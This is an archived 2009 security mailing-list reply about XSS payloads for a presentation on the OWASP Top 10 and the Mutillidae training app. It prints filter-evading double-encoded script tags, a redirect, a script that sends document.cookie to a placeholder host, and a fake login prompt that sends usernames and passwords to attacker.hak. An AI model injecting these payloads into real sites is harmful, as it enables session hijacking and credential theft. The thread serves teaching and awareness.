PaulDotCom mailing list archives
Cool things to inject via XSS
From: trklisted at networksamurai.org (mOses)
Date: Fri, 29 May 2009 10:50:53 -0400
Adrian, On May 28, 2009, at 2:50 PM, Adrian Crenshaw wrote:
Ok, I've got yet another presentation coming up, this time on the OWASP Top 10 and Mutillidae. One of the things I'm going to cover is XSS. The canonical example of course is: <script>alert("XSS");</script> but that is boring, and gives folks the impression that XSS is not that serious. Better short eample swoul be:
One of the more interesting challenges with web applications is the fact that the browser supports multi encoding types and double encoding entries. Here is a SIMPLE double encode of your alert: <script>alert('WEEEE');</script> Hex encode the < and / tags: %3Cscript%3Ealert('WEEEE');%3C%2Fscript%3E Maybe you can avoid simple filtering of a single encode filtering by encoding the % in the '%3C': %253Cscript%253Ealert('WEEE');%253%252Fscript%253E We can go further and continue to obfuscate things and bypass more and more filters.
Redirect traffic to your site: <script>window.location = "http://www.irongeek.com/"</script> A little cookie Grabbing: <script> new Image().src="http://some-ip/mutillidae/catch.php? cookie="+encodeURI(document.cookie); </script>
In addition its also worthwhile to note that you do not even need to have a real running webserver on this particular http://some-ip/ mutillidae/ The important thing to note is what the browser is understanding here. http://some-ip/catch.php? <- this script doesn't technically need to exist. cookie='+ <--- this is the part that is telling the browser hey in the actual URL stream append something beyond the cookie= field. +encodeURI(document.cookie); <- HEY in the URI field insert your current cookie from this current site and send it in the raw URL. If you have a backdoor listening shell then you will get the cookie in a URI encoded format showing up in your listener as a RAW http request.
Or maybe a password form to make people think they have to login, but it just grabs the credentials: <script> username=prompt('Please enter your username',' '); password=prompt('Please enter your password',' '); document.write("<img src=\"http://attacker.hak/catch.php? username="+username+"&password="+password+"\">"); </script> What are other cool thing to inject, besides maybe BeEF, that shows of how XSS can be a big deal?
Other uses include a distributed port scanner within javascript leveraging the browser and sending in a port scan and scanning the network that she is on.
Thanks, Adrian _______________________________________________ Pauldotcom mailing list Pauldotcom at mail.pauldotcom.com http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom Main Web Site: http://pauldotcom.com
-------------- next part -------------- An HTML attachment was scrubbed... URL: http://mail.pauldotcom.com/pipermail/pauldotcom/attachments/20090529/dd048a17/attachment.htm
Current thread:
- Cool things to inject via XSS, (continued)
- Cool things to inject via XSS Michael McGrew (May 28)
- Cool things to inject via XSS Jim Halfpenny (May 28)
- Cool things to inject via XSS christopher.riley at r-it.at (May 29)
- Cool things to inject via XSS Michael Douglas (May 29)
- Cool things to inject via XSS packetjack (May 29)
- Cool things to inject via XSS Adrian Crenshaw (May 29)
- Cool things to inject via XSS Robin Wood (May 30)
- Finding the common thread... christopher.riley at r-it.at (Jun 15)
- Finding the common thread... Jim Halfpenny (Jun 15)
- Finding the common thread... christopher.riley at r-it.at (Jun 16)
- Cool things to inject via XSS Michael Douglas (May 29)